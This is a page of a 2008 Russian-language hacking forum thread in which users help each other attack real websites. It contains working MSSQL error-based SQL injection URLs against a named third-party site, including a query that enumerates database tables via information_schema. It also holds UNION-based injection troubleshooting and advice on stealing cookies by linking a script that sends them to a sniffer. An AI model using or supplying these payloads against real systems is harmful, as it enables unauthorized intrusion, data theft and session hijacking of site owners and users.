HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #771  
Старый 21.01.2008, 16:59
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
Провел на форуме:
71644

Репутация: 11
По умолчанию

Цитата:
Сообщение от Macro  
Так, как я написал про рамблер... Точно так же сработает
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
 
Ответить с цитированием

  #772  
Старый 21.01.2008, 17:00
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от frigid20  
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
 
Ответить с цитированием

  #773  
Старый 21.01.2008, 17:33
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
Провел на форуме:
71644

Репутация: 11
По умолчанию

Цитата:
Сообщение от Macro  
Ссылку не на сниффер, а на файл, в котором код, отправляющий куки на сниффер
мм... я пока плохо разбираюсь в этом( а какой должен быть код в файле?
 
Ответить с цитированием

  #774  
Старый 21.01.2008, 17:49
PunkAss
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435

Репутация: 5
Отправить сообщение для PunkAss с помощью ICQ
По умолчанию

Цитата:
Сообщение от Scipio  
2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
отлично, спс а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
 
Ответить с цитированием

  #775  
Старый 21.01.2008, 18:23
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Хм, тут нарисовалась трабла. Я проводил скулю на сайтенге, и при -1 union select 1/*
выдается ошибка The used SELECT statements have a different number of columns, хотя order by показывает что полей именно 1, но это не важно, я начал работать с подзапросами и при -1 union select 1 from users/* вылезла ошибка Table 'dk.users' doesn't exist а при запросе -1 union select 1 from information_schema.tables почему то опять же вылезла The used SELECT statements have a different number of columns Значит ли это что information_schema.tables существует и к ней есть доступ ?
 
Ответить с цитированием

  #776  
Старый 21.01.2008, 18:31
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
 
Ответить с цитированием

  #777  
Старый 21.01.2008, 18:38
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Цитата:
Да. доступ к таблице есть.
Запросов может быть несколько.
пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
А разве если бы кол-во колонок было неверное мне бы выпадало Table 'dk.users' doesn't exist ?
А, все, пасиб Basurman
Подбирать поля - лень, я нашел более удобную скулю на этом же сайте, доступ к information_schema действительно существует =) Еще раз всем пасиб

Последний раз редактировалось 0nep@t0p; 21.01.2008 в 18:49..
 
Ответить с цитированием

  #778  
Старый 21.01.2008, 18:45
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

да. именно так и происходит
 
Ответить с цитированием

  #779  
Старый 21.01.2008, 23:12
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от PunkAss  
отлично, спс а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
вот смотри:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #780  
Старый 22.01.2008, 00:30
PunkAss
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435

Репутация: 5
Отправить сообщение для PunkAss с помощью ICQ
По умолчанию

Цитата:
Сообщение от Scipio  
текст
можно было просто тыкнуть в статью, я её не читал пасиба, вопрос закрыт.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ